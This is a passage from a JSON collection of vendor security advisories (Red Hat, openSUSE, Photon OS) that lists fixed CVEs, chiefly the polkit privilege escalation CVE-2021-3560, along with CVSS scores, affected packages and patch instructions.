"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-06T11:01:04", "type": "redhat", "title": "(RHSA-2021:2555) Important: OpenShift Container Platform 4.7.19 packages and security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-25217", "CVE-2021-3560"], "modified": "2021-07-06T11:24:04", "id": "RHSA-2021:2555", "href": "https://access.redhat.com/errata/RHSA-2021:2555", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-16T15:29:43", "description": "The redhat-virtualization-host packages provide the Red Hat Virtualization Host. These packages include redhat-release-virtualization-host, ovirt-node, and rhev-hypervisor. Red Hat Virtualization Hosts (RHVH) are installed using a special build of Red Hat Enterprise Linux with only the packages required to host virtual machines. RHVH features a Cockpit user interface for monitoring the host's resources and performing administrative tasks.\n\nThe redhat-virtualization-host packages provide the Red Hat Virtualization Host. These packages include redhat-release-virtualization-host, ovirt-node, and rhev-hypervisor. Red Hat Virtualization Hosts (RHVH) are installed using a special build of Red Hat Enterprise Linux with only the packages required to host virtual machines. RHVH features a Cockpit user interface for monitoring the host's resources and performing administrative tasks. \n\nThe ovirt-node-ng packages provide the Red Hat Virtualization Host. These packages include redhat-release-virtualization-host, ovirt-node, and rhev-hypervisor. Red Hat Virtualization Hosts (RHVH) are installed using a special build of Red Hat Enterprise Linux with only the packages required to host virtual machines. RHVH features a Cockpit user interface for monitoring the host's resources and performing administrative tasks.\n\nSecurity Fix(es):\n\n* glib: integer overflow in g_bytes_new function on 64-bit platforms due to an implicit cast from 64 bits to 32 bits (CVE-2021-27219)\n\n* kernel: userspace applications can misuse the KVM API to cause a write of 16 bytes at an offset up to 32 GB from vcpu->run (CVE-2021-3501)\n\n* polkit: local privilege escalation using polkit_system_bus_name_get_creds_sync() (CVE-2021-3560)\n\n* hw: vt-d related privilege escalation (CVE-2020-24489)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.\n\nBug Fix(es):\n\n* Previously, systemtap dependencies were not included in the RHV-H channel. Therefore, systemtap could not be installed.\nIn this release, the systemtap dependencies have been included in the channel, resolving the issue. (BZ#1903997)", "cvss3": {"exploitabilityScore": 2.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-06-22T14:31:38", "type": "redhat", "title": "(RHSA-2021:2522) Important: Red Hat Virtualization Host security update [ovirt-4.4.6]", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-24489", "CVE-2021-27219", "CVE-2021-3501", "CVE-2021-3560"], "modified": "2021-06-22T14:45:07", "id": "RHSA-2021:2522", "href": "https://access.redhat.com/errata/RHSA-2021:2522", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-09-12T04:36:23", "description": "OpenShift Virtualization is Red Hat's virtualization solution designed for Red Hat OpenShift Container Platform.\n\nThis advisory contains the following OpenShift Virtualization <version_number> images:\n\nRHEL-8-CNV-2.6\n\nhostpath-provisioner-container-v2.6.6-3\nvm-import-controller-container-v2.6.6-5\nvm-import-virtv2v-container-v2.6.6-5\nvm-import-operator-container-v2.6.6-5\nvirt-cdi-apiserver-container-v2.6.6-4\nvirt-cdi-controller-container-v2.6.6-4\nvirt-cdi-cloner-container-v2.6.6-4\nvirt-cdi-importer-container-v2.6.6-4\nvirt-cdi-uploadserver-container-v2.6.6-4\nvirt-cdi-uploadproxy-container-v2.6.6-4\nvirt-cdi-operator-container-v2.6.6-4\novs-cni-marker-container-v2.6.6-5\nkubevirt-ssp-operator-container-v2.6.6-5\nkubemacpool-container-v2.6.6-7\nkubevirt-vmware-container-v2.6.6-4\nkubevirt-kvm-info-nfd-plugin-container-v2.6.6-4\nkubevirt-cpu-model-nfd-plugin-container-v2.6.6-4\nkubevirt-cpu-node-labeller-container-v2.6.6-4\nvirtio-win-container-v2.6.6-4\nkubevirt-template-validator-container-v2.6.6-4\ncnv-containernetworking-plugins-container-v2.6.6-4\nnode-maintenance-operator-container-v2.6.6-4\nkubevirt-v2v-conversion-container-v2.6.6-4\ncluster-network-addons-operator-container-v2.6.6-4\novs-cni-plugin-container-v2.6.6-4\nbridge-marker-container-v2.6.6-4\nkubernetes-nmstate-handler-container-v2.6.6-7\nhyperconverged-cluster-webhook-container-v2.6.6-4\ncnv-must-gather-container-v2.6.6-16\nhyperconverged-cluster-operator-container-v2.6.6-4\nvirt-launcher-container-v2.6.6-7\nhostpath-provisioner-operator-container-v2.6.6-5\nvirt-api-container-v2.6.6-7\nvirt-handler-container-v2.6.6-7\nvirt-controller-container-v2.6.6-7\nvirt-operator-container-v2.6.6-7\nhco-bundle-registry-container-v2.6.6-70\n\nSecurity Fix(es):\n\n* golang: crypto/elliptic: incorrect operations on the P-224 curve (CVE-2021-3114)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-10T13:16:13", "type": "redhat", "title": "(RHSA-2021:3119) Moderate: OpenShift Virtualization 2.6.6 Images security and bug fix update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-10228", "CVE-2017-14502", "CVE-2019-13012", "CVE-2019-14866", "CVE-2019-25013", "CVE-2019-25032", "CVE-2019-25034", "CVE-2019-25035", "CVE-2019-25036", "CVE-2019-25037", "CVE-2019-25038", "CVE-2019-25039", "CVE-2019-25040", "CVE-2019-25041", "CVE-2019-25042", "CVE-2019-2708", "CVE-2019-9169", "CVE-2020-12362", "CVE-2020-12363", "CVE-2020-12364", "CVE-2020-13434", "CVE-2020-13543", "CVE-2020-13584", "CVE-2020-14344", "CVE-2020-14345", "CVE-2020-14346", "CVE-2020-14347", "CVE-2020-14360", "CVE-2020-14361", "CVE-2020-14362", "CVE-2020-14363", "CVE-2020-15358", "CVE-2020-25659", "CVE-2020-25712", "CVE-2020-26116", "CVE-2020-26137", "CVE-2020-27618", "CVE-2020-27619", "CVE-2020-28196", "CVE-2020-28935", "CVE-2020-29361", "CVE-2020-29362", "CVE-2020-29363", "CVE-2020-36242", "CVE-2020-8231", "CVE-2020-8284", "CVE-2020-8285", "CVE-2020-8286", "CVE-2020-8927", "CVE-2020-9948", "CVE-2020-9951", "CVE-2020-9983", "CVE-2021-20201", "CVE-2021-20271", "CVE-2021-23239", "CVE-2021-23240", "CVE-2021-23336", "CVE-2021-25215", "CVE-2021-25217", "CVE-2021-27219", "CVE-2021-28211", "CVE-2021-3114", "CVE-2021-3177", "CVE-2021-32399", "CVE-2021-3326", "CVE-2021-33909", "CVE-2021-33910", "CVE-2021-3516", "CVE-2021-3517", "CVE-2021-3518", "CVE-2021-3520", "CVE-2021-3537", "CVE-2021-3541", "CVE-2021-3560"], "modified": "2021-08-10T13:16:44", "id": "RHSA-2021:3119", "href": "https://access.redhat.com/errata/RHSA-2021:3119", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-09-12T04:36:23", "description": "OpenShift Virtualization is Red Hat's virtualization solution designed for Red Hat OpenShift Container Platform.\n\nThis advisory contains the following OpenShift Virtualization 4.8.0 images:\n\nRHEL-8-CNV-4.8\n==============\n\nkubevirt-template-validator-container-v4.8.0-9\nkubevirt-ssp-operator-container-v4.8.0-41\nvirt-cdi-uploadserver-container-v4.8.0-25\ncnv-must-gather-container-v4.8.0-50\nvirt-cdi-uploadproxy-container-v4.8.0-25\nvirt-cdi-cloner-container-v4.8.0-25\nvirt-cdi-apiserver-container-v4.8.0-25\nkubevirt-v2v-conversion-container-v4.8.0-10\nhostpath-provisioner-operator-container-v4.8.0-17\nhyperconverged-cluster-webhook-container-v4.8.0-62\nhyperconverged-cluster-operator-container-v4.8.0-62\nvirt-cdi-operator-container-v4.8.0-25\nvirt-cdi-importer-container-v4.8.0-25\nvirt-cdi-controller-container-v4.8.0-25\ncnv-containernetworking-plugins-container-v4.8.0-14\nkubemacpool-container-v4.8.0-22\novs-cni-plugin-container-v4.8.0-17\novs-cni-marker-container-v4.8.0-17\nbridge-marker-container-v4.8.0-17\ncluster-network-addons-operator-container-v4.8.0-28\nkubernetes-nmstate-handler-container-v4.8.0-21\nvirtio-win-container-v4.8.0-9\nkubevirt-vmware-container-v4.8.0-11\nhostpath-provisioner-container-v4.8.0-14\nnode-maintenance-operator-container-v4.8.0-19\nvirt-launcher-container-v4.8.0-67\nvm-import-virtv2v-container-v4.8.0-18\nvm-import-controller-container-v4.8.0-18\nvm-import-operator-container-v4.8.0-18\nvirt-handler-container-v4.8.0-67\nvirt-api-container-v4.8.0-67\nvirt-controller-container-v4.8.0-67\nvirt-operator-container-v4.8.0-67\nhco-bundle-registry-container-v4.8.0-451\n\nSecurity Fix(es):\n\n* golang: crypto/ssh: crafted authentication request can lead to nil pointer dereference (CVE-2020-29652)\n\n* gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation (CVE-2021-3121)\n\n* golang-github-gorilla-websocket: integer overflow leads to denial of service (CVE-2020-27813)\n\n* golang: crypto/elliptic: incorrect operations on the P-224 curve (CVE-2021-3114)\n\n* ulikunitz/xz: Infinite loop in readUvarint allows for denial of service (CVE-2021-29482)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-27T12:20:29", "type": "redhat", "title": "(RHSA-2021:2920) Moderate: OpenShift Virtualization 4.8.0 Images", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-10228", "CVE-2017-14502", "CVE-2019-13012", "CVE-2019-14866", "CVE-2019-25013", "CVE-2019-25032", "CVE-2019-25034", "CVE-2019-25035", "CVE-2019-25036", "CVE-2019-25037", "CVE-2019-25038", "CVE-2019-25039", "CVE-2019-25040", "CVE-2019-25041", "CVE-2019-25042", "CVE-2019-2708", "CVE-2019-3842", "CVE-2019-9169", "CVE-2020-12362", "CVE-2020-12363", "CVE-2020-12364", "CVE-2020-13434", "CVE-2020-13543", "CVE-2020-13584", "CVE-2020-13776", "CVE-2020-14344", "CVE-2020-14345", "CVE-2020-14346", "CVE-2020-14347", "CVE-2020-14360", "CVE-2020-14361", "CVE-2020-14362", "CVE-2020-14363", "CVE-2020-15358", "CVE-2020-24977", "CVE-2020-25659", "CVE-2020-25712", "CVE-2020-26116", "CVE-2020-26137", "CVE-2020-26541", "CVE-2020-27618", "CVE-2020-27619", "CVE-2020-27813", "CVE-2020-28196", "CVE-2020-28935", "CVE-2020-29361", "CVE-2020-29362", "CVE-2020-29363", "CVE-2020-29652", "CVE-2020-36242", "CVE-2020-8231", "CVE-2020-8284", "CVE-2020-8285", "CVE-2020-8286", "CVE-2020-8927", "CVE-2020-9948", "CVE-2020-9951", "CVE-2020-9983", "CVE-2021-20201", "CVE-2021-20271", "CVE-2021-23239", "CVE-2021-23240", "CVE-2021-23336", "CVE-2021-25215", "CVE-2021-25217", "CVE-2021-27219", "CVE-2021-28211", "CVE-2021-29482", "CVE-2021-3114", "CVE-2021-3121", "CVE-2021-3177", "CVE-2021-33034", "CVE-2021-3326", "CVE-2021-3516", "CVE-2021-3517", "CVE-2021-3518", "CVE-2021-3520", "CVE-2021-3537", "CVE-2021-3541", "CVE-2021-3560"], "modified": "2021-07-27T12:21:10", "id": "RHSA-2021:2920", "href": "https://access.redhat.com/errata/RHSA-2021:2920", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-09-12T04:36:23", "description": "Red Hat Advanced Cluster Management for Kubernetes 2.3.0 images\n\nRed Hat Advanced Cluster Management for Kubernetes provides the\ncapabilities to address common challenges that administrators and site\nreliability engineers face as they work across a range of public and\nprivate cloud environments. Clusters and applications are all visible and\nmanaged from a single console\u2014with security policy built in.\n\nThis advisory contains the container images for Red Hat Advanced Cluster\nManagement for Kubernetes, which fix several bugs and security issues. See\nthe following Release Notes documentation, which will be updated shortly\nfor this release, for additional details about this release:\n\nhttps://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_mana\ngement_for_kubernetes/2.3/html/release_notes/\n\nSecurity:\n\n* fastify-reply-from: crafted URL allows prefix scape of the proxied backend service (CVE-2021-21321)\n\n* fastify-http-proxy: crafted URL allows prefix scape of the proxied\nbackend service (CVE-2021-21322)\n\n* nodejs-netmask: improper input validation of octal input data (CVE-2021-28918)\n\n* redis: Integer overflow via STRALGO LCS command (CVE-2021-29477)\n\n* redis: Integer overflow via COPY command for large intsets (CVE-2021-29478)\n\n* nodejs-glob-parent: Regular expression denial of service (CVE-2020-28469)\n\n* nodejs-lodash: ReDoS via the toNumber, trim and trimEnd functions\n(CVE-2020-28500)\n\n* golang.org/x/text: Panic in language.ParseAcceptLanguage while parsing -u- extension (CVE-2020-28851)\n\n* golang.org/x/text: Panic in language.ParseAcceptLanguage while processing\nbcp47 tag (CVE-2020-28852)\n\n* nodejs-ansi_up: XSS due to insufficient URL sanitization (CVE-2021-3377)\n\n* oras: zip-slip vulnerability via oras-pull (CVE-2021-21272)\n\n* redis: integer overflow when configurable limit for maximum supported bulk input size is too big on 32-bit platforms (CVE-2021-21309)\n\n* nodejs-lodash: command injection via template (CVE-2021-23337)\n\n* nodejs-hosted-git-info: Regular Expression denial of service via shortcutMatch in fromUrl() (CVE-2021-23362)\n\n* browserslist: parsing of invalid queries could result in Regular Expression Denial of Service (ReDoS) (CVE-2021-23364)\n\n* nodejs-postcss: Regular expression denial of service during source map parsing (CVE-2021-23368)\n\n* nodejs-handlebars: Remote code execution when compiling untrusted compile templates with strict:true option (CVE-2021-23369)\n\n* nodejs-postcss: ReDoS via getAnnotationURL() and loadAnnotation() in lib/previous-map.js (CVE-2021-23382)\n\n* nodejs-handlebars: Remote code execution when compiling untrusted compile templates with compat:true option (CVE-2021-23383)\n\n* openssl: integer overflow in CipherUpdate (CVE-2021-23840)\n\n* openssl: NULL pointer dereference in X509_issuer_and_serial_hash()\n(CVE-2021-23841)\n\n* nodejs-ua-parser-js: ReDoS via malicious User-Agent header (CVE-2021-27292)\n\n* grafana: snapshot feature allow an unauthenticated remote attacker to trigger a DoS via a remote API call (CVE-2021-27358)\n\n* nodejs-is-svg: ReDoS via malicious string (CVE-2021-28092)\n\n* nodejs-netmask: incorrectly parses an IP address that has octal integer with invalid character (CVE-2021-29418)\n\n* ulikunitz/xz: Infinite loop in readUvarint allows for denial of service (CVE-2021-29482)\n\n* normalize-url: ReDoS for data URLs (CVE-2021-33502)\n\n* nodejs-trim-newlines: ReDoS in .end() method (CVE-2021-33623)\n\n* nodejs-path-parse: ReDoS via splitDeviceRe, splitTailRe and splitPathRe (CVE-2021-23343)\n\n* html-parse-stringify: Regular Expression DoS (CVE-2021-23346)\n\n* openssl: incorrect SSLv2 rollback protection (CVE-2021-23839)\n\nFor more details about the security issues, including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npages listed in the References section.\n\nBugs:\n\n* RFE Make the source code for the endpoint-metrics-operator public (BZ# 1913444)\n\n* cluster became offline after apiserver health check (BZ# 1942589)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-08-05T12:52:42", "type": "redhat", "title": "(RHSA-2021:3016) Important: Red Hat Advanced Cluster Management for Kubernetes version 2.3", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-10228", "CVE-2017-14502", "CVE-2018-1000858", "CVE-2018-20843", "CVE-2019-13050", "CVE-2019-13627", "CVE-2019-14889", "CVE-2019-15903", "CVE-2019-19906", "CVE-2019-20454", "CVE-2019-20934", "CVE-2019-25013", "CVE-2019-2708", "CVE-2019-9169", "CVE-2020-11668", "CVE-2020-13434", "CVE-2020-15358", "CVE-2020-1730", "CVE-2020-27618", "CVE-2020-28196", "CVE-2020-28469", "CVE-2020-28500", "CVE-2020-28851", "CVE-2020-28852", "CVE-2020-29361", "CVE-2020-29362", "CVE-2020-29363", "CVE-2020-8231", "CVE-2020-8284", "CVE-2020-8285", "CVE-2020-8286", "CVE-2020-8927", "CVE-2021-20271", "CVE-2021-20305", "CVE-2021-21272", "CVE-2021-21309", "CVE-2021-21321", "CVE-2021-21322", "CVE-2021-23337", "CVE-2021-23343", "CVE-2021-23346", "CVE-2021-23362", "CVE-2021-23364", "CVE-2021-23368", "CVE-2021-23369", "CVE-2021-23382", "CVE-2021-23383", "CVE-2021-23839", "CVE-2021-23840", "CVE-2021-23841", "CVE-2021-25217", "CVE-2021-27219", "CVE-2021-27292", "CVE-2021-27358", "CVE-2021-28092", "CVE-2021-28918", "CVE-2021-29418", "CVE-2021-29477", "CVE-2021-29478", "CVE-2021-29482", "CVE-2021-32399", "CVE-2021-33033", "CVE-2021-33034", "CVE-2021-3326", "CVE-2021-33502", "CVE-2021-33623", "CVE-2021-3377", "CVE-2021-33909", "CVE-2021-33910", "CVE-2021-3449", "CVE-2021-3450", "CVE-2021-3516", "CVE-2021-3517", "CVE-2021-3518", "CVE-2021-3520", "CVE-2021-3537", "CVE-2021-3541", "CVE-2021-3560"], "modified": "2021-08-05T12:52:59", "id": "RHSA-2021:3016", "href": "https://access.redhat.com/errata/RHSA-2021:3016", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2022-11-06T17:58:39", "description": "An update that fixes one vulnerability is now available.\n\nDescription:\n\n This update for polkit fixes the following issues:\n\n - CVE-2021-3560: Fixed a local privilege escalation using\n polkit_system_bus_name_get_creds_sync() (bsc#1186497).\n\n\nPatch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended installation methods\n like YaST online_update or \"zypper patch\".\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.3:\n\n zypper in -t patch openSUSE-SLE-15.3-2021-1843=1", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-11T00:00:00", "type": "suse", "title": "Security update for polkit (important)", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3560"], "modified": "2021-07-11T00:00:00", "id": "OPENSUSE-SU-2021:1843-1", "href": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/2NCYKG2YTUVFTW5R7DJWWWJGLDWU7XE5/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-18T12:40:22", "description": "An update that fixes one vulnerability is now available.\n\nDescription:\n\n This update for polkit fixes the following issues:\n\n - CVE-2021-3560: Fixed a local privilege escalation using\n polkit_system_bus_name_get_creds_sync() (bsc#1186497).\n\n This update was imported from the SUSE:SLE-15-SP2:Update update project.\n\n\nPatch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended installation methods\n like YaST online_update or \"zypper patch\".\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.2:\n\n zypper in -t patch openSUSE-2021-838=1", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-04T00:00:00", "type": "suse", "title": "Security update for polkit (important)", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3560"], "modified": "2021-06-04T00:00:00", "id": "OPENSUSE-SU-2021:0838-1", "href": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/ABSE3IWWQYLOHOVCNFCOZVXFZAYMJYN4/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "photon": [{"lastseen": "2023-06-19T15:19:46", "description": "Updates of ['polkit'] packages of Photon OS have been released.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-03T00:00:00", "type": "photon", "title": "Important Photon OS Security Update - PHSA-2021-4.0-0037", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3560"], "modified": "2021-06-03T00:00:00", "id": "PHSA-2021-4.0-0037", "href": "https://github.com/vmware/photon/wiki/Security-Update-4.0-37", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-19T16:14:32", "description": "Updates of ['polkit'] packages of Photon OS have been released.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-03T00:00:00", "type": "photon", "title": "Important Photon OS Security Update - PHSA-2021-0397", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3560"], "modified": "2021-06-03T00:00:00", "id": "PHSA-2021-0397", "href": "https://github.com/vmware/photon/wiki/Security-Update-1.0-397", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-12T18:56:30", "description": "Updates of ['polkit'] packages of Photon OS have been released.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-03T00:00:00", "type": "photon", "title": "Important Photon OS Security Update - PHSA-2021-0037", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", 